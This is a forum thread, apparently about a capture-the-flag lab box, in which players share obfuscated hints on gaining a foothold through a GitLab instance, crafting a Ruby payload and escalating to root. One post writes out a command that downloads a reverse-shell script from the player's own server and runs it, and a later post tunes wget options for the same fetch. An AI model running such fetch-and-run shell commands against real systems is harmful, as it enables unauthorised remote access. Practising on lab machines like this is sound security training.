Hi Guys, There must be another trick than using R**** C******.
@mohsinhakak said:
Whoops, GitLab is taking too much time to respond. Been like this for days, any information on how to get rid of this please PM, thanks
Same here, it worked great for me before
Hmm, I leaked the secret, but I can't get r*** to run my payload. I tried adding spaces to remove ='s as 0xc45 suggested but still no luck. Any tips?
Stuck on the foothold. I've found the g** URL and made an account. Can create a project and get it to call a r****r on my local g***** instance, but haven't found a way to turn this into anything yet. Searched for CVEs but haven't found any that are useful. As usual I may have missed something obvious?
Rooted
That was an easy box?
I don't think so…
Thanks, @n3ph0s for the nudge on foothold.
Feel free to PM if any help is needed.
Guys, I'm stuck at the beginning. Can someone DM me a hint to start with? I did a service scan and I can't get anywhere around the website.
Rooted!
Why am I so distracted and overlook things???
Contrary to everyone, the user was easier than the root!
Might be luck, but things just went the right path (even not using docker prior to this)…
foot:
- look carefully (enumeration)
- Some things (do… cof… mains) are just a pot full of honey…
- find the version and build piece by piece with that (find that POC)
- When exploiting, if the payload fails, check what was said about the "=" symbols (I did not have that issue though)
- remember what was also said: the machine might not have the bins you want/need
user:
- It was already mentioned (if you can't crack/find, just hammer the guts and reset the machine!)
root:
- Enum (latest) might help you over Peas on this one
- when the spicy thing is found, if you look closely, you just need the initial procedures of RE to see it
If nudges needed, honk the horn on pm
Thought I'd have a nice little time on this box, but it seems to be 502'ing everything for me after stops/starts/resets
Edit: I had to change servers for it to work.
Actually got a shell but no idea about how to find the user flag.
Please send me some nudges.
I've reached the gi**ab page, registered an account, discovered the L_I, but can't understand how to get R_E. I've read about ss*f but it says import url is blocked. Am I on the right path? I'm blocked …
This box made me sweat, there are still some mysteries that I have not solved: why some payload works for one person and not the other …
I spent a lot of time setting up the env
it is not an easy box for me
if you need help PM
Yikes, this is not an easy box for me.
I thought I had some plain ruby working for generating the payload, but it's just not accepted. The "other" more convoluted doc*** route has also failed to generate a payload which works.
Hint for those struggling with a foothold: If you get a "Something went wrong" error, try a different bin
What I suggest for those with payload problems is: Download a shell script from your local python http.server to perform the reverse shell, special symbols may cause problems
This approach got me good: wget "yourserver/rev.sh" && chmod +x rev.sh && ./rev.sh
Trying the bash rev shell directly did not work for me and the one I said above was reliable all the time (used it like 6 times due to resets and stuff)
Having zero luck getting the payload to hit a local web server. This one has bested me.
@trcm said:
Having zero luck getting the payload to hit a local web server. This one has bested me.
How are you generating it??
I tried step by step with the h_c_eron_ page, and I also tried crafting a standalone ruby script.
Ahha, progress. I had to add "--timeout=3 --tries=1" as wget wasn't reaching my web service and was executing in place on the rails console borking the erb instance it seems.